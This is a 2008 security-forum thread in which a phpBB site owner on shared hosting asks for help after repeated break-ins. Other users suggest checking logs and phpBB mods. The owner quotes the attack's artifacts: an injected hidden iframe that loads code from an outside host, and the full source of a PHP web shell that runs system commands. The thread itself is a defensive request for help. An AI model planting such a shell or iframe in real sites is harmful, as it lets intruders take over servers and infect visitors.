|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[help] Someone hacking my site! |
|
Posted: Sat Mar 08, 2008 6:57 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
Hello,
Can anyone please help me as someone is hacking my site every 2-3 days by adding it's code in any of my page such as overall_header.tpl, overall_footer.tpl, page_tail.php, page_header.php and many other files with the following code:-
Code: | <td valign="top"><_i_frame__ src="http://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" _frame_border=0 marginheight=0 marginwidth=0 scrolling=no></_i_frame__><table class="blog" cellpadding="0" cellspacing="0"><tr><td valign="top"><div> |
Can anyone help me in getting rid of this hacker? He is adding the code anywhere on my server and it seems that some tool/utility/code exists on my server through which the hacker is gaining access and editing any file anytime! |
|
|
|
|
|
|
|
|
Posted: Sat Mar 08, 2008 8:26 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
Someone also uploaded a file fab666.php at language/lang_english/fab666.php on my server with the following codes in it
Code: | <?php
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
?> |
Can anyone please help me in getting rid of this hacker who is accessing my server and uploading whatever he wants and does what he wants. Changing password doesn't work. All files/folders permission are set right. Still he is gaining access.
I need help please |
|
|
|
|
|
|
|
|
Posted: Sat Mar 08, 2008 8:34 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Change pass to FTP,cpanel ..etc.
Where you hosting your site? |
|
|
|
|
Posted: Sat Mar 08, 2008 8:44 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban. |
|
|
|
|
Posted: Sat Mar 08, 2008 9:01 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
gibbocool wrote: | Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban. |
I don't have any technical knowledge. Can you please tell me what do you mean by public applications? I know that I have installed phpBB latest version with over 150 MODs on board. I don't know how to check logs for this domain because I am on shared hosting with this domain is ADD ON domain and using Cpanel. |
|
|
|
|
Posted: Sat Mar 08, 2008 9:06 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
koko wrote: | Change pass to FTP,cpanel ..etc.
Where you hosting your site? |
I changed FTP, Cpanel password but there is no use. The hacker doesn't need to have any password and gaining access through some other way.
I am hosted at Lypha.com with Shared Hosting Package |
|
|
|
|
Posted: Sat Mar 08, 2008 9:07 am |
|
|
Sm0ke |
Moderator |
|
|
Joined: Nov 25, 2006 |
Posts: 141 |
Location: Finland |
|
|
|
|
|
|
he have hacked/cracked another site on server so there is nothing you can do exept report your hosting |
|
|
|
|
Posted: Sat Mar 08, 2008 9:12 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
Sm0ke wrote: | he have hacked/cracked another site on server so there is nothing you can do exept report your hosting |
I checked many sites hosted on my shared hosting account but they all are working fine. I mean all the sites which are of others but hosted on my shared server.
The hacker is uploading files to hack my site, also he is adding codes in my files through which my site doesn't operate properly. I am willing to pay some good amount of money if anyone can help me getting rid of this hacker completely. |
|
|
|
|
Posted: Sat Mar 08, 2008 9:50 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
If server sucksss nobody can help you.Make temp ftp account and send info via PM i look. |
|
|
|
|
Posted: Sat Mar 08, 2008 10:03 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
koko wrote: | If server sucksss nobody can help you.Make temp ftp account and send info via PM i look. |
I have requested my host to change server and they will do in 1-2 days. After that I will see what happens and let you guys know what going on...
Thanks for the support everyone |
|
|
|
|
Posted: Sat Mar 08, 2008 10:06 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
If this hacker hide some code in your appz changing server don't help you. |
|
|
|
|
Posted: Sat Mar 08, 2008 10:12 am |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
koko wrote: | If this hacker hide some code in your appz changing server don't help you. |
What to do then? I don't know where he have stored what file!
Also I don't know to create FTP account to give you access or something because this domain is Add-on domain of the main domain and the hacker is after my Add-on domain on which phpBB is installed. Everything was fine before 2 months and he is attacking every 2-3 days from 2 months! |
|
|
|
|
Posted: Sun Mar 09, 2008 12:40 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know. |
|
|
|
|
|
|
|
|
Posted: Sun Mar 09, 2008 12:26 pm |
|
|
abdulbasit |
Regular user |
|
|
Joined: Mar 07, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
gibbocool wrote: | He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know. |
Which phpBB MOD you think is not secure?
I am moving to other host and will see what happens.
Also I found 1 hacking utility uploaded on my server and I deleted but still he was able to add pinoc.com code in my site!
My site is in public_html so do you think the hacker might have uploaded its utility in any other folder other then public_html ?
Also can you guys tell me some sites where I can submit complaint about this hacker and it's website so that they can take some serious action against him
?
Thank you |
|
|
|
|
|
|
|
|
Posted: Sun Mar 09, 2008 12:36 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Get your logs and go through them to find IP and other info about what he's been doing. Then you can report it to your local authorities. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|